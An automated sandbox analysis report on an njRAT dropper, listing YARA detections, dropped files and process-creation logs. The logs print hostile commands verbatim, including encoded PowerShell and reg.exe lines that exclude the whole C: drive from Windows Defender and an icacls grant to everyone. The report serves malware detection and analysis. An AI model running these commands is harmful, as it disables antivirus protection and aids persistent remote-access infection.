Source: 00000000.00000002.1457358254.0000000013560000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: 00000000.00000002.1457358254.0000000013560000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000000.00000002.1457358254.0000000013560000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 0000000B.00000002.1598765313.000000000337B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: 0000000B.00000002.1598765313.000000000337B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 0000000B.00000002.1598765313.000000000337B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 0000000F.00000002.1646811109.0000000002A61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: 0000000F.00000002.1646811109.0000000002A61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 0000000F.00000002.1646811109.0000000002A61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 00000002.00000002.1558924287.0000000012AB5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: 00000002.00000002.1558924287.0000000012AB5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000002.00000002.1558924287.0000000012AB5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: C:\ClickMe.exe, type: DROPPED Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: C:\ClickMe.exe, type: DROPPED Matched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\ClickMe.exe, type: DROPPED Matched rule: Unknown_Malware_Sample_Jul17_2 date = 2017-08-01, hash1 = 3530d480db082af1823a7eb236203aca24dc3685f08c301466909f0794508a52, author = Florian Roth, description = Detects unknown malware sample with pastebin RAW URL, reference = https://goo.gl/iqH8CK, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\ClickMe.exe, type: DROPPED Matched rule: crimeware_njrat_strings author = Sekoia.io, description = Detects njRAT based on some strings, creation_date = 2022-08-22, classification = TLP:CLEAR, version = 1.0, id = 215807ae-fbcb-478d-8941-e0787b883669
Source: C:\ClickMe.exe, type: DROPPED Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: C:\ClickMe.exe, type: DROPPED Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: C:\ClickMe.exe, type: DROPPED Matched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe, type: DROPPED Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe, type: DROPPED Matched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe, type: DROPPED Matched rule: Unknown_Malware_Sample_Jul17_2 date = 2017-08-01, hash1 = 3530d480db082af1823a7eb236203aca24dc3685f08c301466909f0794508a52, author = Florian Roth, description = Detects unknown malware sample with pastebin RAW URL, reference = https://goo.gl/iqH8CK, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe, type: DROPPED Matched rule: crimeware_njrat_strings author = Sekoia.io, description = Detects njRAT based on some strings, creation_date = 2022-08-22, classification = TLP:CLEAR, version = 1.0, id = 215807ae-fbcb-478d-8941-e0787b883669
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe, type: DROPPED Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe, type: DROPPED Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe, type: DROPPED Matched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c382eb151c59bd833b24120723eac541.exe, type: DROPPED Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c382eb151c59bd833b24120723eac541.exe, type: DROPPED Matched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c382eb151c59bd833b24120723eac541.exe, type: DROPPED Matched rule: Unknown_Malware_Sample_Jul17_2 date = 2017-08-01, hash1 = 3530d480db082af1823a7eb236203aca24dc3685f08c301466909f0794508a52, author = Florian Roth, description = Detects unknown malware sample with pastebin RAW URL, reference = https://goo.gl/iqH8CK, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c382eb151c59bd833b24120723eac541.exe, type: DROPPED Matched rule: crimeware_njrat_strings author = Sekoia.io, description = Detects njRAT based on some strings, creation_date = 2022-08-22, classification = TLP:CLEAR, version = 1.0, id = 215807ae-fbcb-478d-8941-e0787b883669
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c382eb151c59bd833b24120723eac541.exe, type: DROPPED Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c382eb151c59bd833b24120723eac541.exe, type: DROPPED Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c382eb151c59bd833b24120723eac541.exe, type: DROPPED Matched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
Source: C:\Users\user\AppData\Roaming\dllhost.exe, type: DROPPED Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: C:\Users\user\AppData\Roaming\dllhost.exe, type: DROPPED Matched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\Users\user\AppData\Roaming\dllhost.exe, type: DROPPED Matched rule: Unknown_Malware_Sample_Jul17_2 date = 2017-08-01, hash1 = 3530d480db082af1823a7eb236203aca24dc3685f08c301466909f0794508a52, author = Florian Roth, description = Detects unknown malware sample with pastebin RAW URL, reference = https://goo.gl/iqH8CK, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\Users\user\AppData\Roaming\dllhost.exe, type: DROPPED Matched rule: crimeware_njrat_strings author = Sekoia.io, description = Detects njRAT based on some strings, creation_date = 2022-08-22, classification = TLP:CLEAR, version = 1.0, id = 215807ae-fbcb-478d-8941-e0787b883669
Source: C:\Users\user\AppData\Roaming\dllhost.exe, type: DROPPED Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: C:\Users\user\AppData\Roaming\dllhost.exe, type: DROPPED Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: C:\Users\user\AppData\Roaming\dllhost.exe, type: DROPPED Matched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\final.exe, type: DROPPED Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\final.exe, type: DROPPED Matched rule: crimeware_njrat_strings author = Sekoia.io, description = Detects njRAT based on some strings, creation_date = 2022-08-22, classification = TLP:CLEAR, version = 1.0, id = 215807ae-fbcb-478d-8941-e0787b883669
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\final.exe, type: DROPPED Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\final.exe, type: DROPPED Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\final.exe, type: DROPPED Matched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Hyra.exe, type: DROPPED Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Hyra.exe, type: DROPPED Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Hyra.exe, type: DROPPED Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Hyra.exe, type: DROPPED Matched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
Source: classification engine Classification label: mal100.phis.bank.troj.adwa.spyw.expl.evad.winEXE@38/29@5/4
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe Code function: 15_2_00A7AD86 AdjustTokenPrivileges, 15_2_00A7AD86
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe Code function: 15_2_00A7AD4F AdjustTokenPrivileges, 15_2_00A7AD4F
Source: C:\Users\user\AppData\Roaming\dllhost.exe Code function: 20_2_006BAD86 AdjustTokenPrivileges, 20_2_006BAD86
Source: C:\Users\user\AppData\Roaming\dllhost.exe Code function: 20_2_006BAD4F AdjustTokenPrivileges, 20_2_006BAD4F
Source: C:\Users\user\AppData\Roaming\dllhost.exe Code function: 24_2_00A5AD86 AdjustTokenPrivileges, 24_2_00A5AD86
Source: C:\Users\user\AppData\Roaming\dllhost.exe Code function: 24_2_00A5AD4F AdjustTokenPrivileges, 24_2_00A5AD4F
Source: C:\Users\user\AppData\Roaming\dllhost.exe Code function: 25_2_00D3AD86 AdjustTokenPrivileges, 25_2_00D3AD86
Source: C:\Users\user\AppData\Roaming\dllhost.exe Code function: 25_2_00D3AD4F AdjustTokenPrivileges, 25_2_00D3AD4F
Source: C:\Users\user\AppData\Roaming\dllhost.exe Code function: 26_2_0095AD86 AdjustTokenPrivileges, 26_2_0095AD86
Source: C:\Users\user\AppData\Roaming\dllhost.exe Code function: 26_2_0095AD4F AdjustTokenPrivileges, 26_2_0095AD4F
Source: C:\Users\user\Desktop\virus.exe.bin.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v2.0
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5028:120:WilError_03
Source: C:\Users\user\AppData\Roaming\dllhost.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3364:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3828:120:WilError_03
Source: C:\Users\user\AppData\Roaming\dllhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5624:120:WilError_03
Source: C:\Users\user\AppData\Roaming\dllhost.exe Mutant created: \Sessions\1\BaseNamedObjects\c382eb151c59bd833b24120723eac541
Source: C:\Users\user\Desktop\virus.exe.bin.exe File created: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted
Source: virus.exe.bin.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: virus.exe.bin.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
Source: C:\Users\user\Desktop\virus.exe.bin.exe File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\virus.exe.bin.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: virus.exe.bin.exe ReversingLabs: Detection: 66%
Source: virus.exe.bin.exe Virustotal: Detection: 65%
Source: javaw.exe String found in binary or memory: H[Ljavafx/scene/paint/Stop;
Source: javaw.exe String found in binary or memory: H[Ljavafx/scene/paint/Stop;
Source: javaw.exe String found in binary or memory: C@(ZD)[Ljavafx/scene/paint/Stop;
Source: javaw.exe String found in binary or memory: C@(ZD)[Ljavafx/scene/paint/Stop;
Source: javaw.exe String found in binary or memory: twccom/sun/javafx/application/LauncherImpl$$Lambda$54
Source: javaw.exe String found in binary or memory: com/sun/javafx/application/LauncherImpl$$Lambda$48
Source: C:\Users\user\Desktop\virus.exe.bin.exe File read: C:\Users\user\Desktop\virus.exe.bin.exe
Source: unknown Process created: C:\Users\user\Desktop\virus.exe.bin.exe "C:\Users\user\Desktop\virus.exe.bin.exe"
Source: unknown Process created: C:\Windows\System32\dllhost.exe C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
Source: C:\Users\user\Desktop\virus.exe.bin.exe Process created: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Hyra.exe "C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Hyra.exe"
Source: C:\Users\user\Desktop\virus.exe.bin.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\ere.js"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\ere.js" /elevate
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc cABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACAALQBjAG8AbQBtAGEAbgBkACAAIgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAIgBDADoAXAANAAoA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc cgBlAGcAIABhAGQAZAAgACIASABLAEwATQBcAFMATwBGAFQAVwBBAFIARQBcAFAAbwBsAGkAYwBpAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAgAEQAZQBmAGUAbgBkAGUAcgBcAEUAeABjAGwAdQBzAGkAbwBuAHMAXABQAGEAdABoAHMAIgAgAC8AdgAgAEMAOgBcAA==
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc 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
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Hyra.exe Process created: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\final.exe "C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\final.exe"
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Hyra.exe Process created: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe "C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe" -jar "C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\HugeHack.jar"
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\icacls.exe C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant "everyone":(OI)(CI)M
Source: C:\Windows\SysWOW64\icacls.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\final.exe Process created: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe "C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe"
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\final.exe Process created: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe "C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "Add-MpPreference -ExclusionPath " C:\
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\reg.exe "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /v C:\
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe Process created: C:\Users\user\AppData\Roaming\dllhost.exe "C:\Users\user\AppData\Roaming\dllhost.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: unknown Process created: C:\Users\user\AppData\Roaming\dllhost.exe "C:\Users\user\AppData\Roaming\dllhost.exe" ..
Source: unknown Process created: C:\Users\user\AppData\Roaming\dllhost.exe "C:\Users\user\AppData\Roaming\dllhost.exe" ..
Source: unknown Process created: C:\Users\user\AppData\Roaming\dllhost.exe "C:\Users\user\AppData\Roaming\dllhost.exe" ..
Source: C:\Users\user\Desktop\virus.exe.bin.exe Process created: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Hyra.exe "C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Hyra.exe"
Source: C:\Users\user\Desktop\virus.exe.bin.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\ere.js"
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Hyra.exe Process created: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\final.exe "C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\final.exe"
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Hyra.exe Process created: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe "C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe" -jar "C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\HugeHack.jar"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\ere.js" /elevate
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc cABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACAALQBjAG8AbQBtAGEAbgBkACAAIgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAIgBDADoAXAANAAoA
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc cgBlAGcAIABhAGQAZAAgACIASABLAEwATQBcAFMATwBGAFQAVwBBAFIARQBcAFAAbwBsAGkAYwBpAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAgAEQAZQBmAGUAbgBkAGUAcgBcAEUAeABjAGwAdQBzAGkAbwBuAHMAXABQAGEAdABoAHMAIgAgAC8AdgAgAEMAOgBcAA==
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc 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
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "Add-MpPreference -ExclusionPath " C:\
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\reg.exe "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /v C:\
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\final.exe Process created: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe "C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe"
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\final.exe Process created: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe "C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe"
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\icacls.exe C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant "everyone":(OI)(CI)M
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe Process created: C:\Users\user\AppData\Roaming\dllhost.exe "C:\Users\user\AppData\Roaming\dllhost.exe"
Source: C:\Users\user\Desktop\virus.exe.bin.exe Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\virus.exe.bin.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\virus.exe.bin.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\virus.exe.bin.exe Section loaded: version.dll
